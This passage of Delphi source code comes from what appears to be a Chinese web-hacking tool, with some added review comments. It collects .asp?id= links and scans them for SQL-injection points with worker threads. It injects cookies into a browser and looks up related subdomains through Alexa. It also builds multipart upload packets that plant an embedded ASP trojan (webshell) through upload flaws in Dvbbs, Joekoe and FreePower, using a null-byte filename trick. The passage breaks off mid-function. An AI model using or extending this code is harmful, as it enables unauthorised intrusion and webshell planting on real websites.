for i := 0 to len - 1 do
begin
item := all.item(i, varempty);
if (Pos('.asp?', LowerCase(item)) > 1) and (Pos('id=', LowerCase(item)) > 1) and (Pos('(', item) = 0) then
if ListBox1.Items.IndexOf(item) = -1 then
ListBox1.Items.Add(item);
end; // for
end; // if Chkinject.Checked then
end; // if not Webbrowser1.Busy then
if Chkinject.Checked then {判断是否需要在浏览网页时检测注入点}
begin
if Webbrowser1.LocationURL <> 'about:blank' then
begin
if webbrowser1.ReadyState = READYSTATE_COMPLETE then
begin
try
if ListBox1.Items.Count = 0 then
begin
LbShowprogress.Caption := '检测完毕,没有注入点!';
Exit;
end;
if Web_Scan_Inject_bool2 then
begin
ScanInjectTimer.Enabled := True;
SetLength(Web_Scan_Inject, 5);
LbShowprogress.Caption := '正在检测注入点...';
WebInjectLsb.Clear;
Web_Scan_Inject_bool := False;
try
for j := 0 to 4 do
begin
Web_Scan_Inject[j] := WebThject.Create(Listbox1, WebInjectLsb, j + 1, 5);
Web_Scan_Inject[j].OnTerminate := Web_Scan_inject_Exit;
sleep(40);
end;
except
end; // try
end; // if Web_Scan_Inject_bool2 then
except
end; // try
end // if webbrowser1.ReadyState = READYSTATE_COMPLETE then
else
begin
if (Web_Scan_Inject_bool) and (ListBox1.Items.Count >= 25) then {检测前25条连接地址}
begin
Web_Scan_Inject_bool := False;
Web_Scan_Inject_bool2 := False;
ScanInjectTimer.Enabled := True;
SetLength(Web_Scan_Inject, 5);
LbShowprogress.Caption := '正在检测注入点...';
WebInjectLsb.Clear;
Web_Scan_Inject_bool := False;
try
for j := 0 to 4 do
begin
Web_Scan_Inject[j] := WebThject.Create(Listbox1, WebInjectLsb, j + 1, 5);
Web_Scan_Inject[j].OnTerminate := Web_Scan_inject_Exit;
sleep(40);
end; //for j := 0 to 4 do
except
end; // try
end; //if (Web_Scan_Inject_bool) and (ListBox1.Items.Count >= 25) then
end; // else
end; // if Webbrowser1.LocationURL <> 'about:blank' then
end; // if Chkinject.Checked then
except
end; // try
end;
procedure TMainForm.WebBrowser1ProgressChange(Sender: TObject; Progress, {Browser - download progress}
  ProgressMax: Integer);
{ Mirror the browser's current URL into EdURL and keep Gauge1 in step with
  the download progress reported by TWebBrowser. }
var
  CurrentURL: string;
begin
  CurrentURL := WebBrowser1.LocationURL;
  { about:blank is the empty start page; show nothing for it }
  if CurrentURL = 'about:blank' then
    EdURL.Text := ''
  else
    EdURL.Text := CurrentURL;
  Gauge1.MaxValue := ProgressMax;
  Gauge1.Progress := Progress;
end;
procedure TMainForm.WebBrowser1StatusTextChange(Sender: TObject;
  const Text: WideString);
{ Show the browser's status-bar text (load / link-hover messages) in Pane1. }
begin
  Pane1.Caption := Text;
end;
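procedure GetAlexa; {Look up the Alexa traffic rank of the URL in EdURL}
{ Fetches http://data.alexa.com/data?cli=10&dat=snba&url=<EdURL> with UrlGetStr
  and shows the value of the TEXT="..." attribute in LbAlexa, or 'No Data' when
  that marker is absent or not terminated by "/> within the 50 characters read.
  Does nothing unless ChkAlexa is checked.
  NOTE(review): btnRefreshClick starts this procedure with BeginThread, yet it
  reads EdURL and writes LbAlexa directly. VCL controls are not thread-safe and
  should only be touched from the main thread (e.g. via TThread.Synchronize).
  NOTE(review): EdURL.Text is concatenated into the query string unencoded. }
const
  RankMarker = '" TEXT="';
  RankTerminator = '"/>';
  Prefix = '网站排名:';
var
  HTML, Fragment: string;
  MarkerPos, EndPos: Integer;
begin
  with MainForm do
  begin
    if not ChkAlexa.Checked then
      Exit;
    HTML := UrlGetStr('http://data.alexa.com/data?cli=10&dat=snba&url=' + EdURL.Text);
    Fragment := '';
    EndPos := 0;
    MarkerPos := Pos(RankMarker, HTML);
    if MarkerPos > 0 then
    begin
      { the rank value follows the marker; at most 50 characters are examined }
      Fragment := Copy(HTML, MarkerPos + Length(RankMarker), 50);
      EndPos := Pos(RankTerminator, Fragment);
    end;
    { an unterminated value used to yield an empty caption; report it as no data }
    if EndPos = 0 then
      LbAlexa.Caption := Prefix + 'No Data'
    else
      LbAlexa.Caption := Prefix + Copy(Fragment, 1, EndPos - 1);
  end;
end;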
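procedure TMainForm.btnRefreshClick(Sender: TObject); {Shared handler for five browser buttons}
{ Dispatches on the clicked button's Tag:
    0  refresh
    1  forward
    2  back
    3  navigate to EdURL and start the Alexa rank lookup thread
    4  push the comma-separated cookies in EditCookie into the current
       document one by one, then refresh
  Browser navigation errors are deliberately ignored (best effort).
  Fix: the TStringList in case 4 is now released in a finally block, so an
  exception from the cookie assignment or the refresh no longer leaks it. }
var
  SList: TStrings;
  i: Integer;
  D: DWORD;
begin
  case TButton(Sender).Tag of
    0:
      try
        WebBrowser1.Refresh;
      except
      end;
    1:
      try
        WebBrowser1.GoForward;
      except
      end;
    2:
      try
        WebBrowser1.GoBack;
      except
      end;
    3:
      try
        PageControl2.TabIndex := 0; {back to the browser tab}
        if Trim(EdURL.Text) = '' then
          Exit; {nothing to navigate to}
        RzSplitter1.Percent := 89;
        LbShowprogress.Caption := '读取连接地址中...';
        WebBrowser1.Navigate(EdURL.Text);
        { NOTE(review): GetAlexa is a parameterless procedure used as a thread
          entry point, and it touches VCL controls from that thread. }
        BeginThread(nil, 0, @GetAlexa, nil, 0, D);
      except
      end;
    4:
      begin
        if EditCookie.Text = '' then
          Exit;
        SList := TStringList.Create;
        try
          SList.CommaText := EditCookie.Text;
          { the document accepts one cookie per assignment }
          for i := 0 to SList.Count - 1 do
            Doc.cookie := SList.Strings[i];
          WebBrowser1.Refresh; {reload so the new cookies are sent}
        finally
          SList.Free;
        end;
      end;
  end;
end;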
procedure TMainForm.OtherSiteTimerTimer(Sender: TObject); {Related-site lookup - poll the result page and extract the names}
{ Timer handler. Each tick copies the body text of the page loaded into
  OtherSiteWeb (by BtnScanOtherSiteClick) into OtherSiteMemo and reacts to
  three markers in it:
    'No Data'                        -> no record for this domain; stop.
    'Where do'                       -> page complete; parse the block cut out
                                        with 'Reach for', one '~'-delimited
                                        name per line, into LvOtherSite; stop.
    'About Alexa' without 'Where do' -> page complete, nothing listed; stop.
  Until one of them appears the timer keeps firing.
  NOTE(review): S is created without try/finally, so an exception while parsing
  leaks it and skips the about:blank navigation below.
  NOTE(review): the while loop reads s.Strings[i] with a counter that is never
  checked against s.Count; an unexpected line layout raises a list-index error.
  It appears to assume exactly one entry per line, in order - confirm against
  the page format.
  NOTE(review): copy(s.Text, p, p2 - p) is only non-empty when 'Reach for' comes
  after 'Where do'; the original comments describe the opposite order - confirm.
  NOTE(review): the Pos(...) > 1 tests treat a match at position 1 as absent;
  > 0 is presumably intended. The inner else branch is unreachable because the
  outer if already tested the same text for 'Where do'. }
var
p, p2: integer;
S: TStrings;
S2: string;
i: integer;
begin
try {keep copying the rendered page text into the memo; errors while it is still loading are ignored}
OtherSiteMemo.Text := IHtmlDocument2(OtherSiteWeb.Document).Body.OuterText;
except
end;
if Pos('No Data', OtherSiteMemo.Text) > 1 then {no record exists for this domain}
begin
OtherSiteTimer.Enabled := False;
OtherSiteWeb.Navigate('about:blank');
LbShowProgress.Caption := '该域名没有任何数据!';
application.MessageBox('抱歉,该域名没有任何数据!', '提示', 64);
Timer1.Enabled := False; {stop the progress bar}
Gauge1.Progress := 0;
Exit;
end;
if Pos('Where do', OtherSiteMemo.Text) > 1 then {'Where do' near the bottom of the text marks a fully loaded page}
begin
OtherSiteTimer.Enabled := False; {stop polling}
try
LvOtherSite.Items.Clear; {empty the list view that holds the names}
except
end;
S := TStringlist.Create;
S.Text := OtherSiteMemo.Text; {work on a copy of the page text}
if pos('Where do', s.Text) > 1 then
begin
p := pos('Where do', s.Text); {position of the 'Where do' marker}
p2 := pos('Reach for', s.Text); {position of the 'Reach for' marker}
s.Text := copy(s.Text, p, p2 - p); {keep only the text between the two markers}
i := 0;
while pos('~', s.Text) > 1 do {one name per iteration; each pass removes the first '~' (no rfReplaceAll), which is what ends the loop}
begin
inc(i);
p := pos('~', s.Strings[i]);
s2 := Copy(s.Strings[i], 1, p - 1); {text before the '~' on this line}
if s2 <> 'Other websites' then
LvOtherSite.Items.Add.Caption := 'http://' + s2;
s.Text := stringreplace(s.Text, '~', '', [rfignorecase]);
end; // while pos('~', s.Text) > 1 do
end
else
begin
application.MessageBox('抱歉,该域名上没有绑定任何二级域名!', '提示', 64);
OtherSiteTimer.Enabled := False;
LbShowProgress.Caption := '没有查询到任何二级域名!';
end; // if pos('Where do', s.Text) > 1 then
S.Free;
OtherSiteWeb.Navigate('about:blank'); {back to a blank page so the browser does not keep the result page in memory}
LbShowProgress.Caption := '共查询到:' + inttostr(LvOtherSite.Items.Count) + '个二级域名';
Timer1.Enabled := False; {stop the progress bar}
Gauge1.Progress := 0;
Exit;
end; // if Pos('Where do', OtherSiteMemo.Text) > 1 then
if (Pos('Where do', OtherSiteMemo.Text) = 0) and (Pos('About Alexa', OtherSiteMemo.Text) > 1) then {page complete but no list present}
begin
OtherSiteTimer.Enabled := False;
LbShowProgress.Caption := '没有查询到任何二级域名!';
OtherSiteWeb.Navigate('about:blank');
Timer1.Enabled := False; {stop the progress bar}
Gauge1.Progress := 0;
application.MessageBox('抱歉,该域名上没有绑定任何二级域名!', '提示', 64);
end;
end;
procedure TMainForm.BtnScanOtherSiteClick(Sender: TObject); {Related-site lookup - start the query for EdOtherSite}
{ Resets the result list and the progress indicators, then loads the Alexa
  traffic-details page for the entered host into the hidden OtherSiteWeb
  browser; OtherSiteTimerTimer parses the result once it has loaded.
  The only input check is that the text contains a '.'; the value is
  appended to the query string as typed. }
var
  Target: string;
begin
  Target := EdOtherSite.Text;
  if Pos('.', Target) = 0 then
    Exit;
  LvOtherSite.Items.Clear;
  Gauge1.MaxValue := 100;
  Timer1.Enabled := True;
  LbShowProgress.Caption := '查询二级域名中...';
  OtherSiteMemo.Clear;
  OtherSiteTimer.Enabled := True;
  OtherSiteWeb.Navigate('http://www.alexa.com/data/details/traffic_details?q=&url=' + Target);
end;
function GetAspFile: string; {Upload panel - return the ASP trojan text from the embedded resource or an external file}
{ The source is chosen by MainForm.RdDefault: when it is checked the resource
  named 'diyasp' of type 'aspfile' in this executable is read; otherwise the
  file named in MainForm.AspFilePath is loaded with TStringList.LoadFromFile.
  NOTE(review): the TResourceStream is never freed, and neither branch uses
  try/finally, so a failing SaveToStream/LoadFromFile (a missing file raises
  to the caller) leaks the objects created before it.
  NOTE(review, detection): the resource name/type pair is fixed in this build
  and is a static marker of it. }
var
FMemo: TStringStream;
TmpStr: TStrings;
Res: TResourceStream;
begin
if MainForm.RdDefault.Checked then {default trojan selected: read it from the resource}
begin
FMemo := TStringStream.Create('');
Res := TResourceStream.Create(HInstance, PChar('diyasp'), 'aspfile');
Res.SaveToStream(FMemo);
Result := FMemo.DataString;
FMemo.Free; {Res is not released here}
end
else {otherwise use the external trojan file}
begin
TmpStr := TStringList.Create;
TmpStr.LoadFromFile(MainForm.AspFilePath.Text); {load the trojan file}
Result := TmpStr.Text;
TmpStr.Free;
end;
end;
procedure TMainForm.BtnBrowserFileClick(Sender: TObject); {Upload panel - shared handler for its buttons}
{ Tag 0 pastes the clipboard into EdtCookies; Tag 1 opens the path typed in
  EdShellPath with Explorer (ignored when empty). Any other Tag does nothing. }
var
  Target: string;
begin
  if TButton(Sender).Tag = 0 then
    EdtCookies.PasteFromClipboard
  else if TButton(Sender).Tag = 1 then
  begin
    Target := EdShellPath.Text;
    if Target <> '' then
      ShellExecute(Handle, 'Open', 'EXPLORER.EXE', PChar(Target), nil, SW_SHOW);
  end;
end;
procedure TMainForm.RdDefaultClick(Sender: TObject); {Upload panel - choose the default or a custom file}
{ Tag 0 (default) fills AspFilePath with 'diy.asp'; Tag 1 (custom) clears it. }
begin
  if TRadioButton(Sender).Tag = 0 then
    AspFilePath.Text := 'diy.asp'
  else if TRadioButton(Sender).Tag = 1 then
    AspFilePath.Text := '';
end;
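function GetHostDir(HostAddr: string): string; {Upload panel - host plus directory part of a URL}
{ Return 'http://' followed by everything before the last '/' of HostAddr
  (after the first 'http://' has been removed), i.e. the host and directory
  of a URL. When HostAddr contains no '/' the whole remainder is the host.
  Examples: 'http://host/dir/page.asp' -> 'http://host/dir'
            'host/'                    -> 'http://host'
            'host'                     -> 'http://host'
  Fix: the original located the last '/' by replacing slashes one at a time
  in a while loop and left P uninitialised when there was no '/', so the
  result was garbage for a bare host name. }
var
  P: Integer;
begin
  HostAddr := StringReplace(HostAddr, 'http://', '', [rfIgnoreCase]);
  P := LastDelimiter('/', HostAddr);
  if P = 0 then
    Result := 'http://' + HostAddr
  else
    Result := 'http://' + Copy(HostAddr, 1, P - 1);
end;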
function GetHost(Host: string): string; {Upload panel - host part of a URL}
{ Remove the first 'http://' and return the text before the first '/'.
  When there is no '/', or it is the very first character, the whole
  remaining string is returned unchanged. }
var
  SlashPos: Integer;
begin
  Host := StringReplace(Host, 'http://', '', [rfIgnoreCase]);
  Result := Host;
  SlashPos := Pos('/', Host);
  if SlashPos > 1 then
    SetLength(Result, SlashPos - 1); {truncate at the slash}
end;
function GetPostPage(Host: string): string; {Upload panel - path part of a URL}
{ Remove the first 'http://' and return the text from the first '/' to the
  end. When there is no '/', Pos yields 0 and that is passed to Copy as the
  start index unchanged (RTL-defined behaviour, kept as in the original). }
var
  SlashPos: Integer;
begin
  Host := StringReplace(Host, 'http://', '', [rfIgnoreCase]);
  SlashPos := Pos('/', Host);
  Result := Copy(Host, SlashPos, Length(Host));
end;
function Dv_PostCdoe: string; {综合上传 - 构造上传ASP木马的数据包}
const
H = #13#10;
var
ASPFile: TStrings;
begin
Result := '';
Result := Result + '-----------------------------7d22f8371b051c' + H;
if MainForm.Rd_Joekoe.Checked then {如果选中的乔客上传}
Result := Result + 'Content-Disposition: form-data; name="up_name"' + H + H
else
begin
if (MainForm.Rd_Dvbbs.Checked) or (MainForm.Rd_FreePower.Checked) then {否则}
Result := Result + 'Content-Disposition: form-data; name="filepath"' + H + H;
end;
if MainForm.RdCustom.Checked then {如果选中自定义上传类型 - 开始定义路径字段}
Result := Result + 'Content-Disposition: form-data; name="' + MainForm.EdPathField.Text + '"' + H + H;
if MainForm.RdDefault.Checked then
Result := Result + MainForm.AspFilePath.Text + #0 + H
else
Result := Result + ExtractFileName(MainForm.AspFilePath.Text) + #0 + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
Result := Result + 'Content-Disposition: form-data; name="act"' + H + H;
Result := Result + 'upload' + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
if MainForm.Rd_Dvbbs.Checked then {如果选中动网上传}
Result := Result + 'Content-Disposition: form-data; name="file1"; filename="c:\image.gif"' + H;
if MainForm.Rd_FreePower.Checked then {如果选中动力上传}
begin
if MainForm.RadPower1.Checked then {动力上传类型1}
begin
if MainForm.RdDefault.Checked then {如果是默认的asp木马}